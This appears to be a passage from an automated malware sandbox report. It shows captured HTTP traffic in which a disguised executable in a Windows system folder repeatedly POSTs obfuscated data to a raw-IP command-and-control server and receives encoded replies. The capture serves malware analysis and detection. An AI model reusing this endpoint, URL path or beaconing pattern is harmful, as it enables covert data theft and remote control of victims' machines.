                                                                                                26192.168.2.44976889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:57.007466078 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:57.360899925 CET2036OUTData Raw: 59 54 43 56 5b 59 53 52 58 5b 57 56 50 5d 5b 56 55 52 5e 5c 54 51 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTCV[YSRX[WVP][VUR^\TQQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'D/!0+-=]?P?/*"<=,^(!8?3Z)%.<'*'_!/Y.1
                                                                                                Jan 10, 2025 07:57:57.750890970 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:57.886811972 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:57 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 1f 23 38 23 0e 24 3f 08 0b 2d 59 39 57 28 20 28 1d 2a 5b 2c 06 3d 0d 24 0d 3a 59 34 0b 22 15 0c 05 29 22 26 51 26 2f 2b 0f 32 37 21 59 0c 13 26 5f 3c 3a 2e 0c 29 03 20 5e 2b 31 0f 18 30 0d 02 06 33 13 00 08 21 3c 33 07 2b 29 22 0b 2b 08 32 0b 39 2a 2c 5f 3e 02 2c 1c 24 1c 2a 57 0c 1f 25 0e 22 0c 13 13 36 32 3e 11 30 01 3f 1f 30 01 28 57 25 01 02 05 23 3a 06 01 2c 39 20 5d 36 3d 37 06 3d 00 31 0f 22 22 27 0c 28 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989#8#$?-Y9W( (*[,=$:Y4")"&Q&/+27!Y&_<:.) ^+103!<3+)"+29*,_>,$*W%"62>0?0(W%#:,9 ]6=7=1""'(, Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                27192.168.2.44976989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:57.133534908 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:57.485857010 CET2536OUTData Raw: 59 51 46 55 5e 5d 56 5e 58 5b 57 56 50 5b 5b 57 55 57 5e 5e 54 5a 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YQFU^]V^X[WVP[[WUW^^TZQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;'X(![? ,>>.7?8!<<3Z=$.8_0'_!/Y.9
                                                                                                Jan 10, 2025 07:57:57.897707939 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:58.037674904 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:57 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                28192.168.2.44977089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:58.159732103 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:57:58.517132998 CET2544OUTData Raw: 5c 54 46 50 5b 59 56 56 58 5b 57 56 50 53 5b 50 55 50 5e 5d 54 5f 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TFP[YVVX[WVPS[PUP^]T_Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C,1Y<>:?6,%V<-? 5$'V*0?),*C&\$:'_!/Y.
                                                                                                Jan 10, 2025 07:57:58.919815063 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:57:59.070936918 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:57:58 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                29192.168.2.44977289.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:57:59.189234972 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:57:59.548393965 CET2544OUTData Raw: 59 5e 46 54 5e 5b 56 50 58 5b 57 56 50 58 5b 54 55 5c 5e 53 54 5d 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y^FT^[VPX[WVPX[TU\^ST]Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'C,28+9<P8]/.>.'<8X"7#(3/_><>F1=^$'_!/Y.%
                                                                                                Jan 10, 2025 07:57:59.954938889 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 37 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:57:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                30192.168.2.44977889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:00.105047941 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:00.454629898 CET2544OUTData Raw: 5c 56 46 53 5e 56 56 54 58 5b 57 56 50 52 5b 56 55 50 5e 5d 54 5d 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VFS^VVTX[WVPR[VUP^]T]QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'81/\+-)(6\/)R<- <(+!4#Q?)9&.$''_!/Y.
                                                                                                Jan 10, 2025 07:58:00.838918924 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:00.968684912 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                31192.168.2.44978989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:01.097579002 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:01.454739094 CET2544OUTData Raw: 5c 55 43 52 5b 5a 56 52 58 5b 57 56 50 5c 5b 5a 55 54 5e 5f 54 5c 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UCR[ZVRX[WVP\[ZUT^_T\QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@81#?1(6[/\9R?4+8]"#P+0?^+?.2>4X3*'_!/Y.
                                                                                                Jan 10, 2025 07:58:01.932148933 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                32192.168.2.44979589.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:02.056330919 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:02.407752037 CET2544OUTData Raw: 59 54 43 50 5b 5a 56 50 58 5b 57 56 50 5e 5b 54 55 50 5e 53 54 5e 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTCP[ZVPX[WVP^[TUP^ST^QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,<2(P$,>?-$^?^?!,(03_=)&.$^$'_!/Y.=
                                                                                                Jan 10, 2025 07:58:02.803215027 CET25INHTTP/1.1 100 Continue


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                33192.168.2.44979689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:02.925606012 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2012
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:03.282778978 CET2012OUTData Raw: 59 56 43 53 5e 5d 56 52 58 5b 57 56 50 58 5b 51 55 5c 5e 5e 54 5d 51 5b 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YVCS^]VRX[WVPX[QU\^^T]Q[RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/!$(>9[+#,"(><^<8#!47<$=?9&>70'_!/Y.%
                                                                                                Jan 10, 2025 07:58:03.786283016 CET374INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 30 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 1e 3a 0d 37 05 2f 0a 26 2f 36 0a 2e 2c 22 0f 28 09 34 5a 3d 2d 0a 00 2a 33 2f 1e 2d 3c 3b 54 21 3b 00 00 3f 31 22 50 27 02 06 55 32 0d 21 59 0c 13 26 5b 3d 3a 0f 56 29 3a 2c 13 3c 0f 36 43 33 30 20 03 33 3d 31 54 34 3f 2c 5c 3f 5c 32 0b 28 1f 0c 0c 3a 07 01 04 28 2f 3c 1c 27 0c 2a 57 0c 1f 26 57 35 54 3e 0f 36 32 2d 00 25 3b 3f 1e 25 28 06 50 32 06 24 02 20 3a 02 00 2c 2a 3f 03 35 3e 3f 07 2a 3e 0c 10 23 31 20 18 2b 2c 20 51 22 0d 22 50 [TRUNCATED]
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:03 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding98:7/&/6.,"(4Z=-*3/-<;T!;?1"P'U2!Y&[=:V):,<6C30 3=1T4?,\?\2(:(/<'*W&W5T>62-%;?%(P2$ :,*?5>?*>#1 +, Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                34192.168.2.44980189.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:03.244288921 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:03.595292091 CET2544OUTData Raw: 59 55 43 56 5e 58 56 55 58 5b 57 56 50 5c 5b 55 55 50 5e 59 54 5d 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YUCV^XVUX[WVP\[UUP^YT]QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';(+">&8\,=R(=8^<8?!4*34=!$-_3'_!/Y.
                                                                                                Jan 10, 2025 07:58:04.003618956 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:04.195121050 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:03 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                35192.168.2.44980889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:04.323093891 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:04.673408985 CET2544OUTData Raw: 59 57 46 50 5e 56 56 55 58 5b 57 56 50 5c 5b 52 55 55 5e 58 54 5d 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YWFP^VVUX[WVP\[RUU^XT]QYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,!#>=[>5#,*=U?8(+<6$(<3#_=?$>($'_!/Y.
                                                                                                Jan 10, 2025 07:58:05.183228970 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:05.324965000 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                36192.168.2.44981489.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:05.510200977 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:05.860974073 CET2544OUTData Raw: 5c 52 43 50 5e 56 56 55 58 5b 57 56 50 5f 5b 56 55 54 5e 5d 54 59 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
